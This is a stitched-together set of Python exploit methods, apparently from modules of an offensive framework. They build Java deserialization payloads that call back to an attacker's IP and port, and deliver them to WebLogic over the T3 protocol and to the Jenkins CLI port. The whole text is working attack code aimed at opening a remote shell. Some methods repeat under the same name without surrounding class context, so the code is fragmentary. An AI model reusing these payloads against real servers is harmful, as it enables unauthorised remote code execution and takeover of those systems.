def upload_and_run_mosdef(self):
#payload
payload = objectcreator(callback_ip=self.callback.ip,
callback_port=self.callback.port,
use_http=False, use_ssl=False).get_payload()
logging.info('Payload created (%d bytes).' % len(payload))
logging.info('Path request: %s' % self.path_request)
return self.ua.POST(self.path_request, payload, noresponse=True)
def evil_t3_message(self, version):
HEADER_LENGTH_SIZE = 4
payload_type = "java.util.Random" if "10.3.6" in version else "java.net.InetAddr"
payload = objectcreator(callback_ip=self.callback.ip,
callback_port=self.callback.port,
use_http=self.needs_mosdef_http(),
use_ssl=False).get_payload(payload_type)
header = "\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x30\x89\xf4\x5d\x9b\xbc\xf4\x7a\x28\xbc\xca\x70\x70\x18\x1e\x29\xd8\x3f\x5b\x6b\x8a\x60\x22\x04\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00"
interior = header + payload
return (struct.pack(">L",
len(interior) + HEADER_LENGTH_SIZE) + interior)
def upload_and_run_mosdef(self):
payload_type = "java.util.Random" if "10.3.6" in self.version else "java.net.InetAddr"
payload = objectcreator(callback_ip=self.callback.ip,
callback_port=self.callback.port,
use_http=False,
use_ssl=False).get_payload(payload_type)
logging.info('Payload created (%d bytes).' % len(payload))
# set mosdef payload
the_poison = PAYLOADS['evildata'].replace("THE_PAYLOAD", payload)
# first 4 bytes are the length of data
the_poison = struct.pack('>I', len(the_poison)) + the_poison[4:]
# we need send the payload two time to receive callback
self.send_evil_object(the_poison)
self.send_evil_object(the_poison)
def run(self):
self.getargs()
self.setInfo("%s attacking %s:%d (in progress)" %
(self.name, self.host, self.port))
self.log("Using version: %s" % self.version)
cli_port = self.get_jenkins_info()
failed = True
if cli_port != None:
self.log("Grabbed Jenkins CLI protocol V1 port:%d" % cli_port)
self.setProgress(33)
payload = objectcreator(callback_ip=self.callback.ip,
callback_port=self.callback.port,
use_http=self.needs_mosdef_http(),
use_ssl=False).get_payload()
sock = socket.socket(socket.AF_INET)
sock.settimeout(float(3))
sock.connect((self.host, cli_port))
self.setProgress(25)
sock.sendall(self.jenkins_string("Protocol:CLI-connect"))
blob = self.welcome_recv(sock)
self.setProgress(50)
# The next part is important
remoting_header = blob[:blob.index('>') + 1]
self.setProgress(75)
sock.sendall(remoting_header + base64.b64encode(payload))
self.setInfo("sleeping 5 seconds - waiting for callback...")
time.sleep(5)
sock.close()
self.setProgress(100)
failed = False
return 1 if not failed else 0
def run(self):
self.getargs()
self.setInfo("%s attacking %s:%d (in progress)" %
(self.name, self.host, self.port))
payload = objectcreator(callback_ip=self.callback.ip,
callback_port=self.callback.port,
use_http=self.needs_mosdef_http(),
use_ssl=self.needs_mosdef_ssl()).get_payload()
self.send_request(payload)
self.setInfo("%s attacking %s:%d (DONE)" %
(self.name, self.host, self.port))
return 1